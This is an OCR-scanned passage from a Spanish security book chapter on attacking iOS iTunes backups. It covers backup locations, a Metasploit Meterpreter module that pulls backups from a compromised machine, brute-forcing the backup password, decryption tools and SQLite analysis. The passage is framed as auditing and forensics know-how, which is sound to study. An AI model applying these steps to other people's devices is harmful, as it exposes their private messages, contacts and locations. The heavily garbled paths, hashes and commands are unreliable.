Esto  es  importante  porque  una  de  las  características  de  Apple  íTunm  es  llevar  a  cabo  copias  de 
seguridad  cada  ve/  que  nn  terminal  es  conectado  y  sincronizado  con  el  sistema  operativo.  Esos  datos, 
que  se  alT-nacenan  en  local,  pueden  dñarse  o  no  según  la  configuración  que  establezca  el  usuario 
en  el  interfaz  de  la  aplicación,  pero  en  cualquier  caso  supondrán  una  fuente  jugosa  de  información, 
como  se  va  a  ver  en  este  capí  ti]  lo. 


I  -r  : 


Itnllur  QDpNi  Stt^Jrfe&wl  4ub>fiiAf3c»i«f«t« 


ir  E^avgtirktsd  y  iwlaui^r  irwiuilmiviti 


O'Oouf 


envía  aei  IPiimief 


QUwle  fin  R>3id  U1U  Dopb  üv  ihi  JtH  clAiE  rrhta 


0' Coteonlefuid^ 


^  AtnwÉmri  «*:  ^  «¡pMlilaif 


dt  saouidid  ^  (Fharw 

UIU.CO0I  cjvMvuiíttafldt  ta» 
Ktíimfím  dfr  tfti  utsitEada  «n 


CaMbtarqycniWiftV...  ] 


Imagen  04.01 :  Opciniies  de  cifl  í^do  Jt;  rhmes. 
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2.  Localización  de  los  ficheros  del  backup 

Cada  vez  que  se  produce  una  sincronizacinu  ád  dispositivo  (ya  sea  iPhone^  iPad  o  iFod  Tomh)  los 
ficheros  de  la  copia  de  seguridad  son  todos  depositados  dentro  de  un  diree  Lorio  que  tiene  de  nombre 
el  identíficador  del  dispositivo,  derioniiiiado  UDID  {Unigue  Device  IDmtiJre.r),  y  en  algunos  casos, 
según  la  versión,  también  ima  marca  de  tiempo  (TirntsUimp).  Las  rutas  en  las  que  se  guardan  estos 
directorios  depeudeit  del  sistema  operativo  que  esté  utilizando  el  usuario,  y  son  las  que  pueden  verse 
en  la  siguiente  tabla: 


ssoo 

LoealízaciÓD 

Windows  Xi^ 

%HOMEPATH%  v^pplicalion  DataVAppk  CompiiterVMabi  leSync\llackup\{UDID} 

Windows  7/S 

%H  0  VI E  PATH  % Wpp DataXRo  amin  gV Appl  e  Compiiter\M  o  bí  leSy nc\Backup\  { U  DI D  } 

Mac'  OS 

-^Llbiaiy/Appl  i  catión  Support/Xdobi  íeSyric/'t]  ackup/  {L7DID  | 

Poseer  est{>s  archivos  compromete  completamente  la  seguridad  del  terminal,  ya  que  con  las 
herramientas  y  los  conocimientos  adecuados,  se  va  a  poder  acceder  a  casi  toda  la  información  que  el 
terminal  nióvil  contenga,  e  mcluso,  a  datos  guardados  en  servicios  remotos  o  por  aplicaciones  que 
el  usuario  utilice  en  su  día  a  día,  como  Whatsapp,  l  acebook  o  Linkedm. 

Estos  ficheros  son  tan  relevantes  que  incluso  aplicaciones  de  hackmg,  como  el  popularybf7?nf?w/jr.^ 
de  explotación  de  vulnerabilidades  Metasplon  ha  incluido,  en  su  última  versión,  un  módulo  de 
postín  trusión  pana  Meíerpreter,  que  busca  en  el  sistema  operativo  comprometido  los  archivos  de  las 
copias  de  seguridad  de  iOS  y  los  descargará  de  forma  automática. 


reotíibt:  -■ 


aietgrprerer  >  n¡n  pfl^T/mu T tí/ gaThflr/apple_ios  backup 

1=»^)  Checking  for  backups  in  C :  \ÜSErs\ad[iÍJi\Ap|iD^ts\Rptíiújig\AppW  Casj 
ckup  ¡ 

Í*1  Checking  Tor  baclcups  in  C;\U5rr5\adiiír.if/-HUii/\A|]poatavaua»lng>| 
leSyncy Backup  | 

Í*l  PouEid  e:\Users\actein*W7-0ei27\A|jpl>ata\Ríra[iiJíg\Aí?pIe  Cgii^íüttírAMalj 
B5a3fa9223adddcb3rrcca0e3b«93f^ffedf  < 

[»I  FMind  C.\Uscrs\aásán  W-BmTF\^ipüñTA\íuriñtkiTiq\f^\^  tMp»uter\MQbl 
bain65773392755I4crídf552ce0Bliafti«if 

in  PülUrig  data  trojn  C;  VUsers\adinin.H7-aei27'\AppData\RMmins\ARplE 
\Biatküp\2e6fi05a9fa92233díWct]3rFíic8eMbe93feilffedt . .  ■ 

[*I  neading  fianlffesT  .ribdb  fran  C:WsersVadnila.yí7-6ei27\ftppi?at3NFiCHaBl 
Dbltfibvnc\Backup\2eB0B5a9fo9Z233ditócb37í:cae6abrgtf wlffedf . . . 
m  Reading  f^ifest , rebdjc  fitm  C:\ll«ft^1i^fldIKn.hí7-e3l27^App€BtaSRQ£ai 
cbiLeSync\Backup\2eMe5ii9fa9ZZ33dddcb37ccae6Sbc93fedffedf . . , 

[*I  DCM>l3ading  ft|)pDoi*ain-es  ,elilim|K3,eltifiíifio  Docurients/eltl&apa.dbf 
[*¡  Dovnlpading  Hcaiflfíísnmin  Libro ry/WtbtCít/l>itatMse5/http^_pinailp.twl^ 
eeddeefiii.db.  . 

[  ^  1  D  Dfwn  loading  HomeC  omain  Lib  <  a  ry /itebKit  /Da  taba  se*  /  Dai  abas  o  s .  b . . .  i 
1*1  Dffwnloading  Hpücüwrain  Lihrary/VDiceíiait/vclceiwit.db. . .  F 

t*í  Downlfawiing  HnmerBflanalP  Llhrary/Safarl/BcolüMrka  ,^. .  -  ^ 


Inidgeri  04.02;  Ejecución  del  ii^úddo  iipple  áCíBáo:  meisrprezer. 
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Utilizar  este  módulo  es  tan  sencillo  como  invocar  al  svript  que  realiza  la  búsqueda  de  ios  backups 
por  todo  el  sistema  operativo  y  que  los  descarga  mediante  el  comando  siguiente,  tal  y  como  se  puede 
ver  en  la  imagen  anterior: 

'*run  posL/i!iuiti/g¿íther/iappJ_e_i.os_Tciackira"^ , 

A  partir  de  ese  momento,  si  se  localiza  un  backup^  el  proceso  será  automático  y  descargará  todos  y 
cada  uno  de  los  ñcheros  localizados  a  la  máquina  local. 


3.  Estructura  de  un  backup  de  iOS 

El  primer  acceso  a  los  ficheros  que  conforman  la  copia  de  seguridad  de  un  dispositivo  iOS  puede 
resultar  algo  confiiso  la  primera  vez.  Esto  es  así  porque  los  archivos  tienen  como  nombre  un  valor 
hexadecímal  de  40  caracteres  que  corresponde  a  un  Hmh  SHAl  del  nombre  del  '‘dominio”  al  que 
pcrLenccc  cada  uno  de  ellos,  mas  el  nombre  real  del  fichero  dentro  del  dispositivij,  unidos  los  dos 
por  un  símNilo  de  guión. 

Por  ejemplo,  para  el  archivo  de  imágenes  de  la  agenda  de  contactos,  que  se  encuentra  ubicado 
dentro  del  terminal  en  la  ruta  del  sistema  de  archivos  siguiente: 

Library/í%dd.re^£3Boc>k/ AdccressBaok  im^qes  .  f^^qlitedh' 

Y  que  pertenece  al  dominio  HomeDomain,  se  tendrá  como  nombre  de  ficitero  dentro  del  bQckup  de 
Apple  íTimes  el  resultante  de  aplicar  esta  íunción: 

SHAl  C"HomeDí:>ni3Íni“Library/ Add.ro iJSBoük/AfidrfiíiÉBoDklinages  .sqlitedb"  ) 

Es  decir: 

cd67D2cea2l>i-e89cf230a'?67  9^405ai:ibl'?f9aOe!e 

Para  conocer  todos  los  dominios  posibles  que  existen  en  un  sistema  de  hackup  de  Apple  ¡Time^ 
se  puede  cuiisultar  el  fichero  /Sysíem/Library/Backup/Domaim  F^^  dentro  del  dispositivo,  donde 
están  todos  ellos  descritos.  Por  supuesto,  estos  son  comunes  para  todos  los  terminales,  por  lo  que 
se  verá  un  poco  más  adelante  como  las  herramientíis  automatizan  la  decodifieación  de  los  mismos. 

Estos  ficheros,  una  vez  decodíticado  el  nombre  del  mismo,  podrán  estar  o  no  cifrados  dependiendo 
de  lo  que  haya  elegido  el  usuario.  Sin  embargo,  dentro  del  backup  hay  otros  archivos  creados  por 
Apple  íTunes  en  el  momento  de  hacer  la  copia  de  seguridad  con  información  geiienaí  del  sistema  y 
que  sietnpre  estáu  sin  cifrar,  independientemente  de  la  configuración  que  se  haya  establecido.  Su 
utilidad  va  a  ser  mucha,  y  son  los  si gui entes: 

Intd.Flist:  contiene  detalles  del  terminal  étimo  par  ejemplo  el  modelo,  el  IMEl,  las 
aplicaciones  instaladas,  la  fecha  de  backup  o  el  número  de  serie. 

-  ManifeskPlist:  visto  con  anterioridad,  mantiene  detalles  de  las  rutas  de  las  aplicaciones 
instaladas,  el  número  de  serie,  el  tipo  de  dispositivo,  UUID,  e  iiifonnacíóii  referente  a  la 
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seguridad,  como  si  el  resto  de  ^chivos  están  cifrados  o  no  y  si  el  dispositivo  solicita  código 
de  bUíquco. 

Staíus.Plist:  con  inform ación  de  la  copia,  como  la  hora  al  a  que  se  realizó,  si  fiie  completa 
y  tenuiiió  de  tóiina  satisfactoria  y  el  IJUTD. 

-  Manifest.mbdb:  base  de  datos  con  información  sobre  el  resto  de  nchcn>s  y  sus  tamaños 
y  estrnctura.  Es  c1  punto  principal  paia  mapear  tos  nombres  de  ios  ficheros  de  la  copia  de 
seguridad  y  sus  correspondencias  dentro  dcl  sis  Lema  de  ficheros  de  IOS.  Su  tbnnato  binario 
se  describe  en  la  siguiente  tabla: 


Tipo 

Dato 

Descripción 

sírlng 

Dominio 

N  ombre  dcl  dom i n i  í  j . 

string 

Ruta 

Ruta  dcl  fichero. 

strtng 

Destino 

Rula  absoluta  para  los  enlaces  simbólicos.  i 

Nash 

Hash  SHAh  OxFFFF  para  direcLorios  y  ficheros  del  dominio 
AppDoniaíii.  0x0014  para  los  ficheros  del  dominio  SysiEm, 

siriñg 

Clave  de  cifmdo 

üxl'FFF  para  ficheros  no  cifrados. 

uintí 6 

Modo 

Identifica  el  tipo  de  fichent.  OxaOfiO  para  enlaces  simbólicos. 
0x4000  para  directorios.  0x8000  para  ficheros. 

uint64 

número  de  iñudo 

Número  de  iiiodo. 

7áinS2 

User  JD 

UID  del  fichero,  generalmente  .5Í>¡ . 

mní32 

Group  IP 

GL'ID  del  fichero,  gencralmcnLc  50L 

uínÚ2 

Feclia  de  ull.  mod 

Fecha  de  iiUima  mínlificacióo  en  formato  Epoch. 

umí}2 

l  echa  de  ult.  acceso 

Fecha  de  último  acceso  en  formato  Epoch, 

tdnú2 

Fecha  de  creación 

Fecha  de  creación  en  formato  Epoch. 

tim64 

Tamafio 

Tamaño  del  fichero,  ü  para  enlaces  simbólicos  y  diiectorios. 

uintS 

Protection  Class 

Nivel  de  protección,  desde  Ox  \  hasta  OxB. 

ulñíS 

Núni  de  propiedades 

Niimero  de  propiedades. 

^itrlng 

Nombre  prop 

Nombre  de  la  propiedad  del  fichero. 

string 

Valor  prop 

Valor  de  la  propiedad. 

£1  resto  de  arcliivos  no  se  podrá  leer  de  foniia  diiecta  si  la  copia  se  hizo  con  contraseña  y  será 
necesario  saber  esta  para  desciíf arios  y  visualizar  su  contenido.  A  eoiitinu ación  se  va  a  tratar  este 
punto. 
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04,03  Fichero  Üomüms.pHsi 


4.  Crackear  la  contraseña  de  cifrado  del  backup  de 
Apple  iTbnes 

En  el  caso  de  que  los  ficheros  de  la  copia  de  seguridad  estén  cifrados  hay  ulilidadcs  que  irán  probando, 
una  a  una.  diferentes  coiiibinacioncH  de  clavos  hasta  dar  con  la  contraseña  de  cifrado  correcta,  bl 
proceso  es  muy  lento  pero  es  posible  realizarlo  aunque  evidentemente  existen  ÍBctores  que  iacidiráji 
direcrainenTe  en  su  éxito  o  no,  como  la  contiaseña  elegida  por  el  usuario,  la  eonfiguracibn  de  las 
pruebas  a  realizar  y  la  capacidad  de  cdniputo  que  tenga  el  sistema  de  cracking  elegido,  para  lo  que 
se  rceomienda  utilizar  un  potente  sistema. 

Las  dos  aplicaciones  más  populares  en  el  mundo  de  la  seguridad  para  realizar  esta  tarea  lie  cj^acking 
de  la  contraseña  de  cifrado  del  backup  son  IGk  Passward  Recove fy  desarrollada  por  han 
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Cohibíiv  s  y  de  distribución  gratuita  eii  Internet  para  uso  personal  y  no  comercial  y  FhomPassword 
Breakerút  ia  compañía  Floomsoft,  que  es  distribuida  mediante  licencias  comerciales. 

En  ambos  casos  la  idea  del  cracking  es  similar.  Se  abre  el  fichero  binario  almacenado  en  el  directorio 
ded  hücknp  llamado  MamfesLPlísr,  donde  como  ya  se  ba  mencioado  ames  se  alniacenan  propiedades 
conocidas  de  la  copia  de  seguridad  (como  por  ejemplo  si  el  terminal  móvil  está  protegido  por 
contraseña  [i^VasPasseodeSet],  si  está  cifrado  [IsEíiLTypíi^d])  así  como  la  iníormación  necesaria 
para  poder  recuperai  la  contraseña,  que  es  almacenada  mediante  una  derivación  realizada  con  el 
algoritmo  PRKnF2  y  1 0000  iteraciones  en  los  casos  de  iüS  4,  iOS  ó  e  iOS  6. 

Con  estos  datos,  las  herramientas  podrán  comeíizar  a  realizar  pruebas  hasta  dar  con  la  contraseña 
correcta  de  cifrado. 


imagen  lH.  [H  JG  i  word  Rl'cu  very  Imagen  <)4.<>5  Ekomsofí  Phone  Break^r. 

Desde  el  punto  de  vista  de  un  auditor,  los  pasos  parar  averiguar  lacontrascfia  rucdiaiite  /G  s  Passwoni 
¿iecovery  Sifíte  son  muy  scti cilios: 

Se  extraen  los  bytes  necesari{>s  dcl  Mamfest.PIisí  a  un  fichero  externo  que  interpretará 
la  aplicación.  Este  pasa  lo  hace  automáticamente  ia  utilidad,  por  lo  que  tan  solo  hay  que 
indicarle  la  ubicación  dcl  archivo  original  y  dónde  se  guardará  el  nuevo. 

Se  selecciona  el  tipa  de  atacjuc  de  fuerza  bruta,  donde  lo  nomial  será  utilizar  uno  o  varios 
diccionarios.  Esto  es  lo  conveniente  ya  qne  el  algaritmn  ?BKDF2  está  diseñada  para  ser  muy 
lento  en  el  proccstj  de  cracking  y  hará  que  probar  todas  las  cambinac  iones  posibles  prolongue 
el  procesa  de  descifrado  de  la  contraseña  duran  le  años. 
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-  Se  añaden  los  diccionarios  de  palabras  y  las  reglas  de  iiiuiaclóii  de  los  mismtis,  do  tal 
forma  que  por  cada  palabra  del  fichero  se  deriven  a  otras  mis  vas  más  complejas  qne  pudiera 
liaber  construido  el  usuario.  Para  este  propósito,  en  la  página  web  SkidiSecurity  se  mantiene 
una  lista  de  archivos  de  diccionarios  para  descai'gar  que  pueden  ser  de  mucha  utilidad.  T,a 
URL  de  descarga  es  la  siguiente:  hiipt/Ámmv.skidhecui'ity.org/wjkiñndex.php/Passwords  .r 


l imagen  04.06  Selección  de  tipo  de  ataque  de  fuer?/!  bmíu, 


liuíigsii  04.07  StdecciüL  tk  diccionario  y  reglas. 


Si  se  recorren  Lod[>s  los  ficheros  y  tras  haber  creado  coa  la  herramienta  todas  las  derivadas  no  se 
encuentra  la  clave  de  cifrado,  entonces  se  debe  ir  añadiendo  ctmiplejidad  al  ai:aque  utilizando  otros 
diccionanos  y  odas  reglas  de  derivación,  cv  i  Lando  en  todo  momento  repetir  ficheros  con  las  mismas 
palabras  que  i  [lientos  anteriores  para  no  realizar  trabajo  doble  en  el  ataque. 


File:  Li^sgs  WanuaPnPfilititii  iWirifesi.piiat 
Typer  Af^e®  iOS  4.x^5.x  badajp 
Prortedion:  Apple  lUS  4.x/b.3cbadíupj  PBKDP2/AES 
Tntai  pssawortís  te  process:  3-^32552 
Tcatel  nassworck  processed:  343253 
■  ñle  iy  pasawoTd  pfotacted  te  open  —  ^ Aten» 

Imagen  04.03  Contraseña  recii perada  con  /tr.^  Píissv^'ord Ri^co-fery 


5.  Descifrado  de  los  ficheros  del  backup  de  Apple 
iTunes 

Una  vez  identificada  la  clave  que  el  usuario  uiilizó  para  cifrar  todos  los  datos  del  backup  de  iOS^  el 
siguiente  paso  será  proceder  a  descifrar  todos  los  ficheros  que  componen  la  copia  de  seguridad  del 
terminal,  que  se  guardan  cifrados  con  el  algoritmo  AES256-CBC.  Una  herrarnicTtLa  gralLiiLa  para 
desciñ ai' todos  los  ficheros  dejándolos  tal  y  como  lo  haría  Apple  ¡Tunes  si  no  estuviera  establecida  la 
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contrasella,  es  el  scrfpí  programado  en  lenguaje  Pyíhort  llamado  '‘bactup_tool.py'%  que  se  encuentra 
entre  las  utilidades  de  ¿Phone-dataprotcction.  Gpmo  es  obvio,  para  usar  este  A’cripí  se  debe  conocer 
previamente  la  eonlrasefia  de  cifrado  de  ios  archivos  que  se  ha  tenido  que  averiguar  con  alguna  de 
las  heiTamientas  citadas  anterionnente  y  que  han  sido  diseñadas  para  este  propósito. 


foíitflihti  4pliDiic  íat¡i[»riítectinnj>3rlhart_tt.í 
SU  '  .  ]>ih 


roat§frt:~/iplK]flt-din£aprfftflctiao^/|ivthDn_icrl{»ti4  Pirthcn  J>BcS™p_t[íol.py  /rost/lMckup 
bac;kjp(2 

Device  hane  .  uramosf 
Oisplay  nsm  í  iaf7irD5,f 
Lflit  Backup  Oate  t  2Í12-12-Q6 

líffil  :  ai2l26flK555a334  I 

t:  erial  kjrnher  i  B»a4&^iWEi9 

Product  T^pe  :  iPlHneS.l  1 

ProdlfCt  versión  ±  É_e 

iTunes  Vsrsian  2  ! 

FifrnarT  !>nrkup  td  /rcint/hflckupl  7 

y 

aMcki^i  encrypted 
Entcr  b.-ickup  poEsuord  : 
ftTfin 

Writ ifig  Dftcuioertti/wipw .  ewe  mnte  rom/ ammo  s  f /Sy r.  cState 

uritinc  LilirsrY/Hgclií /M6l3442BOa#£  .wliat^apíi .  P  eT/r/ft/yafíluly3b7i8(lcdlcfeíí4failai75e2Sl 
Writing  LiliraryH™e(íia/M02ltíJS12S^ .  uhatgapp .  rtt/e/O/eGMJCbSISce/CsSSBSBaMTaef  lb75i 

«b 

VftltinQ  HeOji  a/PbQto5treAB9  Data/  ib  ií 70446^^ .  nisc /  Bieecbei  -sa  39  335^^  -  e  d  cedSfid  -  bMiaS  i 

d7-7r 

wntlng  H!Milay  £M:lM/16ftAPPLE/IHS_e3B3^aPa  I 

>h-i.ting  Lál  -flry;Hcdin/34í  íl77ZBBa(iB  -whfltaapp  .1121/3/3/ S&lStcatra ai 3Sfl2«54bdd.9ddd&5*S| 
png 

HTt  1 1  ncf  Hcd  ta/NiDto£t  rc^sData  / 15  E/Bi  /IMAP  PLE/I WQ  Mi?  9 .  J  P5 

writing  Llhi'ary/rií'íii  n/  i4h  yii  ’  I352ie7337«y .  us/a/d/Sdi  1  □^Br7í}443il3aifdis4a8eB;34 

y 

tiylLin^  Libr  31  ^^74^^113/348  2Bei3flea@e;  -whats^p.  net/g/E>/gft7c7  37«Wfi?H nnpn^i una jftf!] naje 
pno 

Hrittng  npcngnr:s/riiSQtirc£i/dE.  iproiyupjjrarir  hrm'   ■ 


liTiagen  04,09^  :^crwí  backup^íooLpy  áíii  cuiijLiiilü  de  herríiiiiietitíis  ¿Phofie-f^nt^pyoiactinn. 


Para  procesar  el  archivo  Aíanífh'ii-^^^bdb  y  navegar  entre  los  ficheros  de  la  copia  de  seguridad  más 
cómodainente,  como  si  de  iiti  explorador  de  archivos  se  trataia,  existen  lieiTamientas  que  recorren 
los  regisüos  y  los  muestran  de  foniia  amigable.  Una  de  estas  utilidades  muy  populares  para  sistemas 
Mieras nfit  Wmdows  es  iPhone  Backup  Browser,  de  uso  gratuito. 


Iinífgeíi  0^1. 10:  (Phtwe  Bachip  Browser  sabtc  copia  de  seguridad. 


CapíUilo  IV.  Atacando  el  backup 


79 


6.  Análisis  de  ficheros  de  un  backup  de  iOS 

A  partir  de  este  moirienü>  las  opciones  para  un pentesíer  se  multiplican.  Es  cuestión  de  paciencia  y 
dedicación  el  ir  analizando  todos  y  c^ida  uno  de  los  ai  chivos  guardados  cu  c!  hackup.  Este  proceso 
es  más  similar  al  trabajo  que  realiza  un  analista  rorense,  y  que  corno  se  verá  en  otro  capítulo  puede 
tener  íierraiu lentas  de  análisis  profesionales,  como  Oxygen  un  pentesíer  puede  hacer 

un  trabajo  rápido  centrándose  en  los  tipos  de  ñclieros  más  ínipo ríanles  dcl  backup. 


Tipos  de  Ficheros  principales 

En  general  existen  pocos  formatos  de  ficheros  dentro  de  un  backiíp  de  iOS  que  sean  de  interés. 
Allí  es  posible  encontrar  arciiivos  multimedia  de  imágenes,  videos,  etcétera,  de  bases  de  datos  en 
formato  SQÜíc  que  utílí/.a  tanto  el  sistema  operativo  como  muchas  aplicaciones  populat es,  ficheros 
pmperry^  Itst  (PÍJst)  y  una  gran  minoría  de  otros  tipos  de  archivo  de  texto  u  (3 tro  tipo  usados  por 
aplicaciones  o  como  almacén  de  documentos.  Los  tipos  más  impormntes  son: 


Apitcacióii 

Archivos 

Configuración  de 
Accesibilidad 

Libraiy^^Piefei  ences/com.y^p/í/í?.  A  ccessibility^P/ isf 

Modo  avión,  Bine  too  tk 
y  JVi-Fi  ■ 

Librar)^''Preferences/com._4/?;7/c.prefeieücesuiet\vork 

Libra  ly/Pr  efer  ences/co  m  Apple .  n  cxwo  rk.capclient.tls. 

TrustEx  e  ept  i  on  s . /^/í  f 

SysteniConfiguratioTi/com„4pp/e.iieUvork,ideiitificalíon.P/i.vf 

Sy  sí  einC  onfigurati  oiEc  oiii  A pp  le.  Wi-F i .  Flist 

Sy  s  Lcm  C  onfi  g  iirat  i  on  ^'preferences  JI  ís  f 

Calendario 

L  i  brary^/C  al  endar/ 

LibraiyvT^referciiccs/conte4pj7/éí.mobi  1  ecal* 

Histórico  de  llamadas 

L  i  br  aiy/C  al  1 H  i  sto  ry 

Reloj 

L  i  braryvT'  referen  ce  s/c  om  .A pple  .mo  b  i  let  inier,  PUs  t 
Libraryv'Preferences.com./l/?^/¿,preferenccs.<ÍalcLimc.P/i,sif 

Contactos 

L  i  brury /4  ddí^ssBo  o  kF 

Nombi-e  del  dispositivo 

S  y  slcm  Confi  gnrati  on/c  om .  A pple  .mob  i  1  e  gesta  It 

Face  lime 

L  ibraryv'Prc  fe  nen  c  e^A  í  >m  .A pp  .  co  n  feren  c  e  ^ 

Atajos  de  teclado 

Libnny /K  ey  bo  ar  * 

LcTigniijes  de  teclado 

Librd.ry/Prcfcrenccs,^lGlohairreferences4A7j'/ 
Librar>/Preferences.Áom./ippA^Preferen  ces  .Piisí 

Library/ P  refei  ence  s^teoni  Apple  ,p  urp  1  ch  llí  Idy  Pl ís  r 

Servicios  de  localización 

Líbraiy/locaíioiid/* 

í-ihrary/rreferences/com.yíp/7/^.locationd./^/jsf 
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Aplicación 

Archivos 

Mapas 

[ .  i  b  rarv  /  Maps/"^ 

Library /Preferences.^'com  .Apple.  A^Iaps  .PUsí 

Configuración  de  música  ídbrary/PrLTcrLTiceís/cüm.^/;pÍÉ;.mübileipt>dJ^¿7i¿ 

^  ^  _  Libmr^vTsl  otes/'^ 

Li  brar y  /P  re  fe  rcj  ic  es/c  oin  Apple .  inob  i  Iciiote  Pllsí 

Configuración  de 
noti  fijaciones 

Library /Bi]  IlitcnRí  lard/^ 

Libmiy /S  pringBo  ard^  F  ush  S  tore/* 

Llbrdry  /S  pi  i  iig  Bo  ard/app  1  i  c  at  í  onstate .  P!  Í3 1 

Libraryv'P  refere  nc  es/c  om  .,4 .springbuard  .P/íiv/ 

Camara  Roü 

Mcdia/DCTM/^ 

Medi  d-fV  ho  toData/"^ 

L  ib  rsiryí?  referen  c  es/c  om  App  ie  ,in  o  bi  1  esli  d  e  show.  PPs  t 

Disposición  de  iconos  de 
aplicaciones 

Li  brary /S  pr  i  rig  B  o  ard^  IconS  late  ,P¡ ís  t 

Configuración  de 
resiriccioncs 

L  i  b  raryf C  onfigur  ati  on  P  rofl  1  e  s/Pi  ibl  i  e  In  fí  j/B  iTcc  ti  v  el  Is  crSeitii  i  gs . 

Fim 

L  ibrar  y/C  l  hi  fi  g  ur  ationP  lofi  1  e  s^TJ  s  er  Sett  in  gs  ^PUs  i 

L  i  braiy/P  refereiic  es/c  uin .  4 ppie.  sp  ri  n  gbo  an  ] .  Pbs  t 

Safari  - 

LWyx^aryíCoolQesICookiúsAúmaryycúokles 

L  ibrary/iSj:¿/2j/77 

L  ibra  ry/T  refe  ren  e  cs/c  t  nn  A pple  AVe  bF  i  j  undali  im.Pl ís  t 

Sajan  favoritos  (en 
iconos  de  pantalla) 

L  i  brary/Web  C  i  ip  si 

Sin 

L  i  bi  aiy/Pre  fe  rene  es  i  c  om^d  ppi  c .  assis  tant* 

CímllpLiraciou  de  SMS, 
MMS,  íMessages  y 
FaceTime 

L  i  braiyTre  feren  c  es  ícom  A  pp  ie .  iiiis  en^  ic  e 

T  ibrnry/Prc fcrcnces/corii-/íp/j/É'.fiiadri d./^/íh7 

L  i  braiyf  Pre  feren  ces  /coin .  4pp  M  ob  i  1  e  S  M  S .  PI  ís  t 

Libraiy/SMS/^ 

Sonidos 

Libiar>^Treferences/com.^j^;?/t?,preferences.soLinds.7'ViSí 

L  i  hrary /Prc  fcrences/co  ni  App  ie.  spr  in  gboai  d  .Pi is  t 

Mensajes  de  v02 

M  e  di  a/'^Recor  din 

Fondos  de  pantalla 

L  i  br  aiy  /  S  p  ti  ngB  oar  d'Lo  c  kB  ackgr  ou  n  d .  cp  b  itmap 

1 .  i  brary/SpriiigBoaí  d/l^ockBackgx  oundThumbnaii  j  pg 

L  i  br  a  ryf  SpringB  oa  rd-íTr  o  m  eB  ac  kg  tí  yim  d .  cpb  i  t  m  ap 
Libraiy/SpnngBoard^HomeBackgroimdrhnmbnailjpg 

Clima 

L  i  br  ary^^  Pre  ferences/co  m  .A  pple,  w  e  ather.  Pl  is  t 
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Análisis  de  Ficheros  SQLite 

Las  bases  de  datos  liQLite  son  un  estándar  en  cualquier  dispositivo  móvil,  ya  sea  iOS  o  Ándtuld. 
Estas  bases  de  datos  se  caracterizan  por  estar  op ti rn izadas  para  ocupar  poco  espacio,  estar  formadas 
por  tan  sííIo  uno  o  dos  ficheros  y  ofrecer  ia  versatilidad  dei  lenguaje  SQL  a  los  desarrolladores  de 
aplicaciones. 


Por  todo  ello  es  muy  común  detectar  un  elevado  número  de  csic  tipo  de  archivos  en  la  copia  de 
seguridad  de  un  icrmiiial  iOS^  ya  que  la  gran  mayoría  de  aplicaciones  almacenará  datos  en  ellos, 
incluidas  las  aplicaciones  del  sistema  operativo  ¡OS^  como  por  ejemplo  las  siguiente; 


Contenido 

ios 

Nombre  dcl  fichero 

Nombre  del  backup 

SMS 

1-4 

sms.db 

">d()d7e^tb2ce288813:í06e4d4636395e047a3d28 

Contactos 

1 

A  ddressBooL^qlit^áb 

adb8c7  75  3  4444e07  c3 1 ÍH  5  924450  G  ed  1  íbcBb  1 

Con  Lacios 

2-4 

A  ddressBooLsq]  itedh 

31  bb?ba89l4766d4ba4i)d6dfb6]  1  ücXbfil  4bs442 

Calendario 

1 

Calendar.sqlitedb 

1 4  ee8cdc3e6e0220399fQ  1 0246e  1  c92b7dfS9a() 

Calendario 

2-4 

Calendar.sqliledb 

2041 457d5fc04d39d0ab4S  i  1 7S  3  55dfó7  S  i  c6858 

Notas 

[-3 

notes.db 

74í]h7eat93d6ea5d305e88hb349c8e9643f48c3b 

Notas 

i4 

not^s.SQLíle 

ca3bc056d4dáObbf8Sb5fb3be254Db7 1 47c639c 

Híst.  de  llamadas 

1 

cal!histor>^db 

a.49bfab36504belbí5ó3cldl8 13ba5efd60707]  7 

Hist,  de  llamadas 

2-3 

callhistory.db 

fn324e6b9491 1  Ib2rb449t;i;ddb50c89u3699d78 

Hist.  de  llamadas 

4 

eallhistory^dh 

2b2bt)()84al  bc3a5acíi  c2  7afc]  f)  4ñtb42c6 1  a  1 9ca 

Localización 

4 

Consolidated. db 

4096c9ec676G847dc283405900e284a7c8 1 5836 

lijiugeii  0.4 .  i  1 :  Hejxamltííita  SQL  Ue  A  ¡Lm  mií  trator, 
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Para  visualizar  el  contenido  de  las  bases  de  datos  existen  múltiples  herrainientas  para  cualquier 
.sistema  operativo  que  pueden  ser  utilizadas.  Desde  la  propia  página  oficial  de  SQTdte  hacen  nn 
inventario  de  ellas  por  lo  que  hay  múltiple  variedad  donde  un  usuario  puede  elegir.  Una  de  estas 
heiTaniientas  es  SQLite  Adm'mistrator^  que  tiene  un  aspecto  como  el  que  se  puede  ver  eu  la  imagen 
anterior.  Este  tipo  de  utilidades  se  conectan  a  travos  dcl  lenguaje  SQL  a  Ins  ficheros  SQJJíp.,  por  lo 
que  muestran  la  mformación  contenida  dentro  de  las  tablas  y  no  dentro  del  fichero,  ya  que  puede  que 
haya  más  datos  dentro  de  los  aicliivos  SQLite  que  los  que  se  veo  en  ias  tablas. 

Estos  archivos  de  SQLíie  tienen  un  ronnato  muy  siruiíar  al  de  un  sistema  de  hchcnis  de  un 
sistema  operativo  al  uso,  en  el  que  se  utilizan  índices  que  apimran  a  los  datos  reales  (los  registros) 
almacenados  dentio  de  él.  Cuando  un  elemento  de  una  tabla  es  eliminado  lo  que  se  modifica  es  el 
registro  y  no  el  dato,  por  lo  que  en  í>casi(mes  cabe  la  posibilidad  de  mstrear  el  arehivo  SQJAie  a  nivel 
de  bits  y  encontrar  incluso  infonnacióii  eliminada  de  la  base  de  datos,  lo  que  puede  ser  de  extrema 
utilidad  con  ios  datos  más  sensibles, 

EditandE)  el  íiehcro  con  un  editor  hexadecimal  seria  más  que  suficiente  para  ver  cadenas  de  texto 
pérdidas  dentro  del  fichero  de  datos,  aunque  hay  opciones  más  visuales  y  eficaces  como  el  servicio 
Reco^^erMessagesxomj  peiiiiiten  el  procesado  automático  desde  una  página  web  para  recuperai 
txsdus  esas  cadenas  de  forma  estructura  y  visulamenLe  cómoda. 


Cutn^iit  Featutefi 

% 

1 

1 

WíiatsApp  tPhon» 

Tuentí  íPfioR« 

Sfjoffiros  IPhon»  ^ 

Lií»  1  Píleme 

SVÍSAníírcjiJ 

& 

SWS  íPtiísíi^fl  ^ 

EMaSts  Ai^dnoíd 

EMaBs  iPtvons 

& 

¡iJiagea  04.12:  CHrai:itíí  í:ilicLi.íi  que  puede  ret:upt?ri£r  R¿‘co\>’er  Message'i. 


El  servicio  RccovcrA\4essag€s  actualmente  procesa  bases  de  datos  SQLite  de  aplicaciones  como 
